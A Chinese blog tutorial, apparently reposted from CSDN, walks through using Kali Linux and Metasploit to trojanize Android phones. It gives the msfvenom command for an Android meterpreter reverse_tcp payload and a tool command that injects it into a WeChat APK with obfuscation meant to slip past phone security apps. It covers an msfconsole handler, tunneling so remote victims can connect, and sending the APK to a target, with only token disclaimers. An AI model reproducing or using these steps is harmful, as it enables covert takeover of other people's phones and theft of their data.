文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

Kali Linux使用MSF木马入侵安卓手机

2023-08-31 14:20

关注

声明:

  1. 本文章仅做娱乐和学习,切勿非法使用!!
  2. 本人技术一般,水平有限,如有不对请多多指正。

一、环境准备

  1. Kali Linux
  2. 安卓手机一部(安卓11)

二、内网穿透

要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的

CSDN博主「Lisa Cpolar」
我这边用的是自己frp拿自己服务器做了内网穿透
在这里插入图片描述

三、木马生成并加到apk

直接用msf生成的apk打开没有内容,安装报毒,且目前的安卓11以上无法直接安装,

msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk

网上大部分都是生成后对apk反编译加马,加签名等等,这边用这位大佬的python工具直接给apk加马,把msf生成的安卓远控附加进普通的app中,并进行加固隐藏特征。可以绕过常见的手机安全管家。
大佬GItHub
使安装python3, Java环境.
使用python3生成apk文件, 需要指定msf远控链接的IP和端口.(本地的填本地kali的IP,做了内网穿透填穿透后的公网地址和端口)

python main.py --lhost 192.168.0.106 --lport 1433  -n ../微信_7.0.22.apk

在这里插入图片描述

三、使用msfconsole加载handler.rc进行服务端监听

加马完成后会在WorkDir文件夹下生成一个handler.rc文件,做了内网穿透的把此文件里面的ip改为kali机的IP,端口改为做kali本地监听公网的那个端口**(注意和上面那个端口的区别)**
然后使用msfconsole加载handler.rc进行服务端监听

msfconsole -r WorkDir/handler.rc

在这里插入图片描述

四、将apk发给目标机安装

请勿违法违规!
在这里插入图片描述

五、结束

对方安装点击就会被监听到,help命令查看
在这里插入图片描述

六、问题

现在手机基本都控制着不给权限,比如我用一个音乐软件只有存储和音频权限,只能截图,获取安装的软件列表,打开软件之类的,要是想控制摄像头就不行,软件也会报错,现在问题就是没办法主动获取权限,只能由用户授权,而且大佬的加马工具也不是所有软件都能成功。
能力有限,水平一般,希望有办法的大佬们指点一下。

来源地址:https://blog.csdn.net/philip_z/article/details/129014231

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-人工智能
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯